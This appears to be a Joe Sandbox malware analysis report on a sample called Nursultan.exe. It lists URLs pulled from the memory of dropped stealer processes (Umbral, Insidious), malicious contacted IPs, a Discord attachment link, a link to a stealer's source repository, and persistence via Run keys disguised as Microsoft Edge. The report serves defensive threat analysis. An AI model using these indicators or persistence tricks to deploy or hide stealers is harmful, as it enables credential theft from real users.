                                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/spreadsheets/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/?lfhs=2Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.comUmbral.exe, 0000000E.00000002.2590100139.000001DCB66A5000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.vimeworld.ru/user/name/Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.youtube.com/s/notifications/manifest/cr_install.htmlUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ipbase.comInsidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.youtube.com/?feature=ytcaUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://freegeoip.appInsidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.youtube.com/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discord.comUmbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discord.com/api/v10/users/Umbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoInsidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://steamcommunity.com/profiles/ASOFTWAREInsidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Blank-c/Umbral-StealerhUmbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discord.comyhl8Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://media.discordapp.net/attachments/1277266726186385433/128176282554=Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.rootca1.amazontrust.com0:cert9.db.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.ecosia.org/newtab/Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp2887.tmp.tmpdb.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ac.ecosia.org/autocomplete?q=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://media.discordapp.net/attachments/1277266726186385433/128176282554Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Blank-c/Umbral-StealerUmbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.0bUmbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/installwebapp?usp=chrUmbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLtmp2887.tmp.tmpdb.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/?usp=installed_webappUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/installwebapp?usp=chro0bUmbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://support.mozilla.orgtmp2887.tmp.tmpdb.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/document/?usp=installed_webappUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.com/json/?fielHUmbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.com/json/?fields=225545Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.95.112.1
                                      		ip-api.comUnited States
                                      		53334TUT-ASUStrue
                                      188.114.97.3
                                      		freegeoip.appEuropean Union
                                      		13335CLOUDFLARENETUStrue
                                      147.185.221.22
                                      		stage-von.gl.at.ply.ggUnited States
                                      		12087SALSGIVERUStrue
                                      104.21.85.189
                                      		ipbase.comUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      162.159.135.232
                                      		discord.comUnited States
                                      		13335CLOUDFLARENETUStrue

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1505919
                                      Start date and time:2024-09-07 01:46:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 47s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:118
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Nursultan.exe
                                      Detection:MAL
                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@155/49@37/5
                                      EGA Information:
                                      • Successful, ratio: 7.4%
                                      HCA Information:
                                      • Successful, ratio: 85%
                                      • Number of executed functions: 293
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.67, 142.250.186.163, 142.250.185.227, 216.58.206.35
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Insidious.exe, PID 7380 because it is empty
                                      • Execution Graph export aborted for target Insidious.exe, PID 7384 because it is empty
                                      • Execution Graph export aborted for target Insidious.exe, PID 7820 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 2924 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7440 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7652 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7864 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 2464 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 528 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 576 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 7544 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 764 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 7676 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 8092 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 5492 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7084 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7404 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7628 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 8044 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 2316 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7388 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7500 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7928 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 5748 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 8036 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Nursultan.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      01:46:47Task SchedulerRun new task: {083F2D61-A183-4DDF-84FC-ECB81CF32D58} path: .
                                      01:47:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge
                                      01:47:41Task SchedulerRun new task: Microsoft Edge path: C:\Users\user\AppData\Roaming\Microsoft s>Edge
                                      01:47:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge
                                      01:47:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                                      19:47:03API Interceptor58x Sleep call for process: powershell.exe modified
                                      19:47:04API Interceptor25x Sleep call for process: Insidious.exe modified
                                      19:47:06API Interceptor1x Sleep call for process: WMIC.exe modified
                                      19:47:08API Interceptor705x Sleep call for process: Umbral.exe modified
                                      19:47:39API Interceptor404596x Sleep call for process: Microsoft Edge.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      208.95.112.1aimbot.exeGet hashmaliciousXWormBrowse
                                      • ip-api.com/line/?fields=hosting
                                      SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                      • ip-api.com/json/?fields=225545
                                      External.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                      • ip-api.com/json/8.46.123.33
                                      #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                      • ip-api.com/line/?fields=hosting
                                      IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      Orden de Compra 4500491659.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      Richiesta-Ordine.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                      • ip-api.com/json/
                                      XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • ip-api.com/line/?fields=hosting
                                      188.114.97.31V8XAuKZqe.exeGet hashmaliciousFormBookBrowse
                                      • www.bzfowe.shop/q0z8/?Fj=mfqDg&Uj=Ymx9M/wL1uuhleVMwT1bTsfoVYAj22k2bUcsCTdCbG+GVa1MDVCHM501+d2WbKwYM+A/8RrRF4O6L+oKg0W124hvIiTC1IcBNHya+453TUId3R/1zfNk3Cs=
                                      firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      firmware.i586.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3/
                                      PDPUOIE76867 PDF.exeGet hashmaliciousFormBookBrowse
                                      • www.supergeoet.best/he2a/?5jE=KDPKyQPAHq8c8hx0cOuDUmk6d6xLTnLoeoK3gEa2Ff+kk78wN/0G6PKXvcNGVh7YJCa9&ZN9Ls=9rCTo2P0wPzDj0p
                                      QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousFormBookBrowse
                                      • filetransfer.io/data-package/76GrdxKp/download
                                      QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                      • filetransfer.io/data-package/76GrdxKp/download

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      freegeoip.appExternal.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                      • 188.114.96.3
                                      Insidious_protected.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                      • 188.114.96.3
                                      nyen2eabmfb.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                      • 188.114.97.3
                                      Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                      • 188.114.97.3
                                      B5U2ccQ8H1.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                      • 188.114.97.3
                                      xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                      • 188.114.96.3
                                      Pots.exeGet hashmalicious44userber Stealer, Rags StealerBrowse
                                      • 104.21.73.97
                                      qdHMT36Tn9.exeGet hashmalicious44Caliber Stealer, Njrat, Rags StealerBrowse
                                      • 172.67.160.84
                                      64drop.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                      • 104.21.73.97
                                      123.scr.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.73.97
                                      discord.comhttps://clicker.extremelyorange.com/Get hashmaliciousUnknownBrowse
                                      • 162.159.137.232
                                      R.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 162.159.135.232
                                      TMPN.exeGet hashmaliciousSkuld StealerBrowse
                                      • 162.159.128.233
                                      bkfaf34.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                      • 162.159.128.233
                                      SolaraBoostrapper.exeGet hashmaliciousBlank GrabberBrowse
                                      • 162.159.135.232
                                      vs64.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.135.232
                                      4.7.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.128.233
                                      stub.exeGet hashmaliciousStealeriumBrowse
                                      • 162.159.136.232
                                      get wifi info temp.exeGet hashmaliciousBabuk, TrojanRansomBrowse
                                      • 162.159.135.232
                                      soinjector.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.128.233
                                      ip-api.comaimbot.exeGet hashmaliciousXWormBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                      • 208.95.112.1
                                      External.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                      • 208.95.112.1
                                      #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                      • 208.95.112.1
                                      IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Orden de Compra 4500491659.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Richiesta-Ordine.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                      • 208.95.112.1
                                      XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 208.95.112.1
                                      ipbase.comExternal.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                      • 172.67.209.71
                                      xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                      • 172.67.209.71
                                      Pots.exeGet hashmalicious44userber Stealer, Rags StealerBrowse
                                      • 104.21.85.189
                                      qdHMT36Tn9.exeGet hashmalicious44Caliber Stealer, Njrat, Rags StealerBrowse
                                      • 172.67.209.71
                                      64drop.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                      • 104.21.85.189
                                      123.scr.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      123.scr.exeGet hashmaliciousRags StealerBrowse
                                      • 172.67.209.71
                                      123.scr.exeGet hashmaliciousRags StealerBrowse
                                      • 172.67.209.71
                                      RP.sfx.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                      • 104.21.85.189
                                      i6R4NsEd8t.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.21.85.189

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttp://polakijayakrishna.github.io/Netflix-HomepageGet hashmaliciousHTMLPhisherBrowse
                                      • 172.66.0.227
                                      https://securemetamaskvallet.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.18.34.227
                                      https://ibd.fcs.mybluehost.me/en/RDGDESDZRFSYJNOI/index.php?FGDD=1Get hashmaliciousHTMLPhisherBrowse
                                      • 104.17.24.14
                                      https://contact-page-helper.bond/contract/61559135234072Get hashmaliciousUnknownBrowse
                                      • 172.67.74.152
                                      http://helpdesk-case-review-appeal-id-09875613.d3218g79rs5u78.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                                      • 104.26.4.15
                                      https://apple-proxy.anwen.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                      • 188.114.96.3
                                      http://vineethkinik.github.io/Netflix-wesite-frontendGet hashmaliciousHTMLPhisherBrowse
                                      • 104.18.86.42
                                      http://buaguhidjn28d.vercel.app/Get hashmaliciousUnknownBrowse
                                      • 104.26.13.205
                                      https://sso--cdn-sub-coinbasepro-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 172.64.153.29
                                      https://sso--cdn--coinbasepro-h-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.18.34.227
                                      CLOUDFLARENETUShttp://polakijayakrishna.github.io/Netflix-HomepageGet hashmaliciousHTMLPhisherBrowse
                                      • 172.66.0.227
                                      https://securemetamaskvallet.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.18.34.227
